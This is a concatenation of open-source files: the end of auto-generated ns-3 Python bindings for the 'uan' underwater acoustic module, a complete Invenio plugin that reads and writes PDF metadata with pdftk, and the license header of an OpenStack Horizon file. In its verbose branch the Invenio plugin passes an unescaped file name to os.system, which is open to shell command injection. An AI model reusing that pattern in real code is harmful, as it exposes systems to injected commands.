cls.add_method('SetNoiseModel',
'void',
[param('ns3::Ptr< ns3::UanNoiseModel >', 'noise')])
## uan-channel.h (module 'uan'): void ns3::UanChannel::SetPropagationModel(ns3::Ptr<ns3::UanPropModel> prop) [member function]
cls.add_method('SetPropagationModel',
'void',
[param('ns3::Ptr< ns3::UanPropModel >', 'prop')])
## uan-channel.h (module 'uan'): void ns3::UanChannel::TxPacket(ns3::Ptr<ns3::UanTransducer> src, ns3::Ptr<ns3::Packet> packet, double txPowerDb, ns3::UanTxMode txmode) [member function]
cls.add_method('TxPacket',
'void',
[param('ns3::Ptr< ns3::UanTransducer >', 'src'), param('ns3::Ptr< ns3::Packet >', 'packet'), param('double', 'txPowerDb'), param('ns3::UanTxMode', 'txmode')])
## uan-channel.h (module 'uan'): void ns3::UanChannel::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3UanModesListChecker_methods(root_module, cls):
## uan-tx-mode.h (module 'uan'): ns3::UanModesListChecker::UanModesListChecker() [constructor]
cls.add_constructor([])
## uan-tx-mode.h (module 'uan'): ns3::UanModesListChecker::UanModesListChecker(ns3::UanModesListChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanModesListChecker const &', 'arg0')])
return
def register_Ns3UanModesListValue_methods(root_module, cls):
## uan-tx-mode.h (module 'uan'): ns3::UanModesListValue::UanModesListValue() [constructor]
cls.add_constructor([])
## uan-tx-mode.h (module 'uan'): ns3::UanModesListValue::UanModesListValue(ns3::UanModesListValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanModesListValue const &', 'arg0')])
## uan-tx-mode.h (module 'uan'): ns3::UanModesListValue::UanModesListValue(ns3::UanModesList const & value) [constructor]
cls.add_constructor([param('ns3::UanModesList const &', 'value')])
## uan-tx-mode.h (module 'uan'): ns3::Ptr<ns3::AttributeValue> ns3::UanModesListValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## uan-tx-mode.h (module 'uan'): bool ns3::UanModesListValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## uan-tx-mode.h (module 'uan'): ns3::UanModesList ns3::UanModesListValue::Get() const [member function]
cls.add_method('Get',
'ns3::UanModesList',
[],
is_const=True)
## uan-tx-mode.h (module 'uan'): std::string ns3::UanModesListValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## uan-tx-mode.h (module 'uan'): void ns3::UanModesListValue::Set(ns3::UanModesList const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::UanModesList const &', 'value')])
return
def register_Ns3UanNetDevice_methods(root_module, cls):
## uan-net-device.h (module 'uan'): ns3::UanNetDevice::UanNetDevice(ns3::UanNetDevice const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UanNetDevice const &', 'arg0')])
## uan-net-device.h (module 'uan'): ns3::UanNetDevice::UanNetDevice() [constructor]
cls.add_constructor([])
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::AddLinkChangeCallback(ns3::Callback<void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> callback) [member function]
cls.add_method('AddLinkChangeCallback',
'void',
[param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')],
is_virtual=True)
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::Clear() [member function]
cls.add_method('Clear',
'void',
[])
## uan-net-device.h (module 'uan'): ns3::Address ns3::UanNetDevice::GetAddress() const [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): ns3::Address ns3::UanNetDevice::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Address',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): ns3::Ptr<ns3::Channel> ns3::UanNetDevice::GetChannel() const [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::Channel >',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): uint32_t ns3::UanNetDevice::GetIfIndex() const [member function]
cls.add_method('GetIfIndex',
'uint32_t',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): ns3::Ptr<ns3::UanMac> ns3::UanNetDevice::GetMac() const [member function]
cls.add_method('GetMac',
'ns3::Ptr< ns3::UanMac >',
[],
is_const=True)
## uan-net-device.h (module 'uan'): uint16_t ns3::UanNetDevice::GetMtu() const [member function]
cls.add_method('GetMtu',
'uint16_t',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): ns3::Address ns3::UanNetDevice::GetMulticast(ns3::Ipv4Address multicastGroup) const [member function]
cls.add_method('GetMulticast',
'ns3::Address',
[param('ns3::Ipv4Address', 'multicastGroup')],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): ns3::Address ns3::UanNetDevice::GetMulticast(ns3::Ipv6Address addr) const [member function]
cls.add_method('GetMulticast',
'ns3::Address',
[param('ns3::Ipv6Address', 'addr')],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): ns3::Ptr<ns3::Node> ns3::UanNetDevice::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): ns3::Ptr<ns3::UanPhy> ns3::UanNetDevice::GetPhy() const [member function]
cls.add_method('GetPhy',
'ns3::Ptr< ns3::UanPhy >',
[],
is_const=True)
## uan-net-device.h (module 'uan'): ns3::Ptr<ns3::UanTransducer> ns3::UanNetDevice::GetTransducer() const [member function]
cls.add_method('GetTransducer',
'ns3::Ptr< ns3::UanTransducer >',
[],
is_const=True)
## uan-net-device.h (module 'uan'): static ns3::TypeId ns3::UanNetDevice::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## uan-net-device.h (module 'uan'): bool ns3::UanNetDevice::IsBridge() const [member function]
cls.add_method('IsBridge',
'bool',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): bool ns3::UanNetDevice::IsBroadcast() const [member function]
cls.add_method('IsBroadcast',
'bool',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): bool ns3::UanNetDevice::IsLinkUp() const [member function]
cls.add_method('IsLinkUp',
'bool',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): bool ns3::UanNetDevice::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): bool ns3::UanNetDevice::IsPointToPoint() const [member function]
cls.add_method('IsPointToPoint',
'bool',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): bool ns3::UanNetDevice::NeedsArp() const [member function]
cls.add_method('NeedsArp',
'bool',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): bool ns3::UanNetDevice::Send(ns3::Ptr<ns3::Packet> packet, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('Send',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_virtual=True)
## uan-net-device.h (module 'uan'): bool ns3::UanNetDevice::SendFrom(ns3::Ptr<ns3::Packet> packet, ns3::Address const & source, ns3::Address const & dest, uint16_t protocolNumber) [member function]
cls.add_method('SendFrom',
'bool',
[param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'source'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')],
is_virtual=True)
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::SetAddress(ns3::Address address) [member function]
cls.add_method('SetAddress',
'void',
[param('ns3::Address', 'address')],
is_virtual=True)
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::SetChannel(ns3::Ptr<ns3::UanChannel> channel) [member function]
cls.add_method('SetChannel',
'void',
[param('ns3::Ptr< ns3::UanChannel >', 'channel')])
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::SetIfIndex(uint32_t const index) [member function]
cls.add_method('SetIfIndex',
'void',
[param('uint32_t const', 'index')],
is_virtual=True)
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::SetMac(ns3::Ptr<ns3::UanMac> mac) [member function]
cls.add_method('SetMac',
'void',
[param('ns3::Ptr< ns3::UanMac >', 'mac')])
## uan-net-device.h (module 'uan'): bool ns3::UanNetDevice::SetMtu(uint16_t const mtu) [member function]
cls.add_method('SetMtu',
'bool',
[param('uint16_t const', 'mtu')],
is_virtual=True)
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_virtual=True)
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::SetPhy(ns3::Ptr<ns3::UanPhy> phy) [member function]
cls.add_method('SetPhy',
'void',
[param('ns3::Ptr< ns3::UanPhy >', 'phy')])
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::SetPromiscReceiveCallback(ns3::Callback<bool,ns3::Ptr<ns3::NetDevice>,ns3::Ptr<const ns3::Packet>,short unsigned int,const ns3::Address&,const ns3::Address&,ns3::NetDevice::PacketType,ns3::empty,ns3::empty,ns3::empty> cb) [member function]
cls.add_method('SetPromiscReceiveCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, short unsigned int, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::SetReceiveCallback(ns3::Callback<bool, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
cls.add_method('SetReceiveCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_virtual=True)
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::SetSleepMode(bool sleep) [member function]
cls.add_method('SetSleepMode',
'void',
[param('bool', 'sleep')])
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::SetTransducer(ns3::Ptr<ns3::UanTransducer> trans) [member function]
cls.add_method('SetTransducer',
'void',
[param('ns3::Ptr< ns3::UanTransducer >', 'trans')])
## uan-net-device.h (module 'uan'): bool ns3::UanNetDevice::SupportsSendFrom() const [member function]
cls.add_method('SupportsSendFrom',
'bool',
[],
is_const=True, is_virtual=True)
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## uan-net-device.h (module 'uan'): void ns3::UanNetDevice::ForwardUp(ns3::Ptr<ns3::Packet> pkt, ns3::UanAddress const & src) [member function]
cls.add_method('ForwardUp',
'void',
[param('ns3::Ptr< ns3::Packet >', 'pkt'), param('ns3::UanAddress const &', 'src')],
visibility='private', is_virtual=True)
return
def register_Ns3UintegerValue_methods(root_module, cls):
## uinteger.h (module 'core'): ns3::UintegerValue::UintegerValue() [constructor]
cls.add_constructor([])
## uinteger.h (module 'core'): ns3::UintegerValue::UintegerValue(ns3::UintegerValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::UintegerValue const &', 'arg0')])
## uinteger.h (module 'core'): ns3::UintegerValue::UintegerValue(uint64_t const & value) [constructor]
cls.add_constructor([param('uint64_t const &', 'value')])
## uinteger.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::UintegerValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## uinteger.h (module 'core'): bool ns3::UintegerValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## uinteger.h (module 'core'): uint64_t ns3::UintegerValue::Get() const [member function]
cls.add_method('Get',
'uint64_t',
[],
is_const=True)
## uinteger.h (module 'core'): std::string ns3::UintegerValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## uinteger.h (module 'core'): void ns3::UintegerValue::Set(uint64_t const & value) [member function]
cls.add_method('Set',
'void',
[param('uint64_t const &', 'value')])
return
def register_Ns3Vector2DChecker_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector2DChecker::Vector2DChecker() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector2DChecker::Vector2DChecker(ns3::Vector2DChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector2DChecker const &', 'arg0')])
return
def register_Ns3Vector2DValue_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue(ns3::Vector2DValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector2DValue const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector2DValue::Vector2DValue(ns3::Vector2D const & value) [constructor]
cls.add_constructor([param('ns3::Vector2D const &', 'value')])
## vector.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::Vector2DValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## vector.h (module 'core'): bool ns3::Vector2DValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## vector.h (module 'core'): ns3::Vector2D ns3::Vector2DValue::Get() const [member function]
cls.add_method('Get',
'ns3::Vector2D',
[],
is_const=True)
## vector.h (module 'core'): std::string ns3::Vector2DValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## vector.h (module 'core'): void ns3::Vector2DValue::Set(ns3::Vector2D const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Vector2D const &', 'value')])
return
def register_Ns3Vector3DChecker_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector3DChecker::Vector3DChecker() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector3DChecker::Vector3DChecker(ns3::Vector3DChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector3DChecker const &', 'arg0')])
return
def register_Ns3Vector3DValue_methods(root_module, cls):
## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue() [constructor]
cls.add_constructor([])
## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue(ns3::Vector3DValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Vector3DValue const &', 'arg0')])
## vector.h (module 'core'): ns3::Vector3DValue::Vector3DValue(ns3::Vector3D const & value) [constructor]
cls.add_constructor([param('ns3::Vector3D const &', 'value')])
## vector.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::Vector3DValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## vector.h (module 'core'): bool ns3::Vector3DValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## vector.h (module 'core'): ns3::Vector3D ns3::Vector3DValue::Get() const [member function]
cls.add_method('Get',
'ns3::Vector3D',
[],
is_const=True)
## vector.h (module 'core'): std::string ns3::Vector3DValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## vector.h (module 'core'): void ns3::Vector3DValue::Set(ns3::Vector3D const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Vector3D const &', 'value')])
return
def register_Ns3AcousticModemEnergyModel_methods(root_module, cls):
## acoustic-modem-energy-model.h (module 'uan'): ns3::AcousticModemEnergyModel::AcousticModemEnergyModel(ns3::AcousticModemEnergyModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AcousticModemEnergyModel const &', 'arg0')])
## acoustic-modem-energy-model.h (module 'uan'): ns3::AcousticModemEnergyModel::AcousticModemEnergyModel() [constructor]
cls.add_constructor([])
## acoustic-modem-energy-model.h (module 'uan'): void ns3::AcousticModemEnergyModel::ChangeState(int newState) [member function]
cls.add_method('ChangeState',
'void',
[param('int', 'newState')],
is_virtual=True)
## acoustic-modem-energy-model.h (module 'uan'): int ns3::AcousticModemEnergyModel::GetCurrentState() const [member function]
cls.add_method('GetCurrentState',
'int',
[],
is_const=True)
## acoustic-modem-energy-model.h (module 'uan'): double ns3::AcousticModemEnergyModel::GetIdlePowerW() const [member function]
cls.add_method('GetIdlePowerW',
'double',
[],
is_const=True)
## acoustic-modem-energy-model.h (module 'uan'): ns3::Ptr<ns3::Node> ns3::AcousticModemEnergyModel::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_const=True, is_virtual=True)
## acoustic-modem-energy-model.h (module 'uan'): double ns3::AcousticModemEnergyModel::GetRxPowerW() const [member function]
cls.add_method('GetRxPowerW',
'double',
[],
is_const=True)
## acoustic-modem-energy-model.h (module 'uan'): double ns3::AcousticModemEnergyModel::GetSleepPowerW() const [member function]
cls.add_method('GetSleepPowerW',
'double',
[],
is_const=True)
## acoustic-modem-energy-model.h (module 'uan'): double ns3::AcousticModemEnergyModel::GetTotalEnergyConsumption() const [member function]
cls.add_method('GetTotalEnergyConsumption',
'double',
[],
is_const=True, is_virtual=True)
## acoustic-modem-energy-model.h (module 'uan'): double ns3::AcousticModemEnergyModel::GetTxPowerW() const [member function]
cls.add_method('GetTxPowerW',
'double',
[],
is_const=True)
## acoustic-modem-energy-model.h (module 'uan'): static ns3::TypeId ns3::AcousticModemEnergyModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## acoustic-modem-energy-model.h (module 'uan'): void ns3::AcousticModemEnergyModel::HandleEnergyDepletion() [member function]
cls.add_method('HandleEnergyDepletion',
'void',
[],
is_virtual=True)
## acoustic-modem-energy-model.h (module 'uan'): void ns3::AcousticModemEnergyModel::SetEnergyDepletionCallback(ns3::Callback<void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> callback) [member function]
cls.add_method('SetEnergyDepletionCallback',
'void',
[param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')])
## acoustic-modem-energy-model.h (module 'uan'): void ns3::AcousticModemEnergyModel::SetEnergySource(ns3::Ptr<ns3::EnergySource> source) [member function]
cls.add_method('SetEnergySource',
'void',
[param('ns3::Ptr< ns3::EnergySource >', 'source')],
is_virtual=True)
## acoustic-modem-energy-model.h (module 'uan'): void ns3::AcousticModemEnergyModel::SetIdlePowerW(double idlePowerW) [member function]
cls.add_method('SetIdlePowerW',
'void',
[param('double', 'idlePowerW')])
## acoustic-modem-energy-model.h (module 'uan'): void ns3::AcousticModemEnergyModel::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_virtual=True)
## acoustic-modem-energy-model.h (module 'uan'): void ns3::AcousticModemEnergyModel::SetRxPowerW(double rxPowerW) [member function]
cls.add_method('SetRxPowerW',
'void',
[param('double', 'rxPowerW')])
## acoustic-modem-energy-model.h (module 'uan'): void ns3::AcousticModemEnergyModel::SetSleepPowerW(double sleepPowerW) [member function]
cls.add_method('SetSleepPowerW',
'void',
[param('double', 'sleepPowerW')])
## acoustic-modem-energy-model.h (module 'uan'): void ns3::AcousticModemEnergyModel::SetTxPowerW(double txPowerW) [member function]
cls.add_method('SetTxPowerW',
'void',
[param('double', 'txPowerW')])
## acoustic-modem-energy-model.h (module 'uan'): void ns3::AcousticModemEnergyModel::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='private', is_virtual=True)
## acoustic-modem-energy-model.h (module 'uan'): double ns3::AcousticModemEnergyModel::DoGetCurrentA() const [member function]
cls.add_method('DoGetCurrentA',
'double',
[],
is_const=True, visibility='private', is_virtual=True)
return
def register_Ns3AddressChecker_methods(root_module, cls):
## address.h (module 'network'): ns3::AddressChecker::AddressChecker() [constructor]
cls.add_constructor([])
## address.h (module 'network'): ns3::AddressChecker::AddressChecker(ns3::AddressChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AddressChecker const &', 'arg0')])
return
def register_Ns3AddressValue_methods(root_module, cls):
## address.h (module 'network'): ns3::AddressValue::AddressValue() [constructor]
cls.add_constructor([])
## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::AddressValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AddressValue const &', 'arg0')])
## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::Address const & value) [constructor]
cls.add_constructor([param('ns3::Address const &', 'value')])
## address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::AddressValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## address.h (module 'network'): bool ns3::AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## address.h (module 'network'): ns3::Address ns3::AddressValue::Get() const [member function]
cls.add_method('Get',
'ns3::Address',
[],
is_const=True)
## address.h (module 'network'): std::string ns3::AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## address.h (module 'network'): void ns3::AddressValue::Set(ns3::Address const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Address const &', 'value')])
return
def register_functions(root_module):
module = root_module
## uan-tx-mode.h (module 'uan'): extern ns3::Ptr<ns3::AttributeChecker const> ns3::MakeUanModesListChecker() [free function]
module.add_function('MakeUanModesListChecker',
'ns3::Ptr< ns3::AttributeChecker const >',
[])
register_functions_ns3_FatalImpl(module.get_submodule('FatalImpl'), root_module)
register_functions_ns3_internal(module.get_submodule('internal'), root_module)
return
def register_functions_ns3_FatalImpl(module, root_module):
return
def register_functions_ns3_internal(module, root_module):
return
def main():
out = FileCodeSink(sys.stdout)
root_module = module_init()
register_types(root_module)
register_methods(root_module)
register_functions(root_module)
root_module.generate(out)
if __name__ == '__main__':
main()
|
gpl-2.0
|
inspirehep/invenio
|
modules/websubmit/lib/wsm_pdftk_plugin.py
|
35
|
7328
|
## This file is part of Invenio.
## Copyright (C) 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
WebSubmit Metadata Plugin - This is the plugin to update metadata from
PDF files.
Dependencies: pdftk
"""
__plugin_version__ = "WebSubmit File Metadata Plugin API 1.0"
import os
import shutil
import tempfile
from invenio.shellutils import run_shell_command
from invenio.bibdocfile import decompose_file
from invenio.config import CFG_PATH_PDFTK, CFG_TMPDIR
from invenio.websubmit_config import InvenioWebSubmitFileMetadataRuntimeError
if not CFG_PATH_PDFTK:
raise ImportError, "Path to PDFTK is not set in CFG_PATH_PDFTK"
def can_read_local(inputfile):
"""
Checks if inputfile is among metadata-readable file types
@param inputfile: path to the image
@type inputfile: string
@rtype: boolean
@return: True if file can be processed
"""
# Check file type (0 base, 1 name, 2 ext)
ext = decompose_file(inputfile)[2]
return ext.lower() in ['.pdf']
def can_write_local(inputfile):
"""
Checks if inputfile is among metadata-writable file types (pdf)
@param inputfile: path to the image
@type inputfile: string
@rtype: boolean
@return: True if file can be processed
"""
ext = os.path.splitext(inputfile)[1]
return ext.lower() in ['.pdf']
def read_metadata_local(inputfile, verbose):
"""
Metadata extraction from many kind of files
@param inputfile: path to the image
@type inputfile: string
@param verbose: verbosity
@type verbose: int
@rtype: dict
@return: dictionary with metadata
"""
cmd = CFG_PATH_PDFTK + ' %s dump_data'
(exit_status, output_std, output_err) = \
run_shell_command(cmd, args=(inputfile,))
metadata_dict = {}
key = None
value = None
for metadata_line in output_std.splitlines():
if metadata_line.strip().startswith("InfoKey"):
key = metadata_line.split(':', 1)[1].strip()
elif metadata_line.strip().startswith("InfoValue"):
value = metadata_line.split(':', 1)[1].strip()
if key in ["ModDate", "CreationDate"]:
# FIXME: Interpret these dates?
try:
pass
#value = datetime.strptime(value, "D:%Y%m%d%H%M%S%Z")
except:
pass
if key:
metadata_dict[key] = value
key = None
else:
try:
custom_key, custom_value = metadata_line.split(':', 1)
metadata_dict[custom_key.strip()] = custom_value.strip()
except:
# Most probably not relevant line
pass
return metadata_dict
def write_metadata_local(inputfile, outputfile, metadata_dictionary, verbose):
"""
Metadata write method, takes the .pdf as input and creates a new
one with the new info.
@param inputfile: path to the pdf
@type inputfile: string
@param outputfile: path to the resulting pdf
@type outputfile: string
@param verbose: verbosity
@type verbose: int
@param metadata_dictionary: metadata information to update inputfile
@type metadata_dictionary: dict
"""
# Take the file name (0 base, 1 name, 2 ext)
filename = decompose_file(inputfile)[1]
# Print pdf metadata
if verbose > 1:
print 'Metadata information in the PDF file ' + filename + ': \n'
try:
os.system(CFG_PATH_PDFTK + ' ' + inputfile + ' dump_data')
except Exception:
print 'Problem with inputfile to PDFTK'
# Info file for pdftk
(fd, path_to_info) = tempfile.mkstemp(prefix="wsm_pdf_plugin_info_", \
dir=CFG_TMPDIR)
os.close(fd)
file_in = open(path_to_info, 'w')
if verbose > 5:
print "Saving PDFTK info file to %s" % path_to_info
# User interaction to form the info file
# Main Case: Dictionary received through option -d
if not metadata_dictionary == {}:
for tag in metadata_dictionary:
line = 'InfoKey: ' + tag + '\nInfoValue: ' + \
metadata_dictionary[tag] + '\n'
if verbose > 0:
print line
file_in.writelines(line)
else:
data_modified = False
user_input = 'user_input'
print "Entering interactive mode. Choose what you want to do:"
while (user_input):
if not data_modified:
try:
user_input = raw_input('[w]rite / [q]uit\n')
except:
print "Aborting"
return
else:
try:
user_input = raw_input('[w]rite / [q]uit and apply / [a]bort \n')
except:
print "Aborting"
return
if user_input == 'q':
if not data_modified:
return
break
elif user_input == 'w':
try:
tag = raw_input('Tag to update:\n')
value = raw_input('With value:\n')
except:
print "Aborting"
return
# Write to info file
line = 'InfoKey: ' + tag + '\nInfoValue: ' + value + '\n'
data_modified = True
file_in.writelines(line)
elif user_input == 'a':
return
else:
print "Invalid option: "
file_in.close()
(fd, pdf_temp_path) = tempfile.mkstemp(prefix="wsm_pdf_plugin_pdf_", \
dir=CFG_TMPDIR)
os.close(fd)
# Now we call pdftk tool to update the info on a pdf
#try:
cmd_pdftk = '%s %s update_info %s output %s'
(exit_status, output_std, output_err) = \
run_shell_command(cmd_pdftk,
args=(CFG_PATH_PDFTK, inputfile,
path_to_info, pdf_temp_path))
if verbose > 5:
print output_std, output_err
if os.path.exists(pdf_temp_path):
# Move to final destination if exist
try:
shutil.move(pdf_temp_path, outputfile)
except Exception, err:
raise InvenioWebSubmitFileMetadataRuntimeError("Could not move %s to %s" % \
(pdf_temp_path, outputfile))
else:
# Something bad happened
raise InvenioWebSubmitFileMetadataRuntimeError("Could not update metadata " + output_err)
|
gpl-2.0
|
dan1/horizon-proto
|
openstack_dashboard/contrib/sahara/content/data_processing/utils/workflow_helpers.py
|
30
|
10029
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
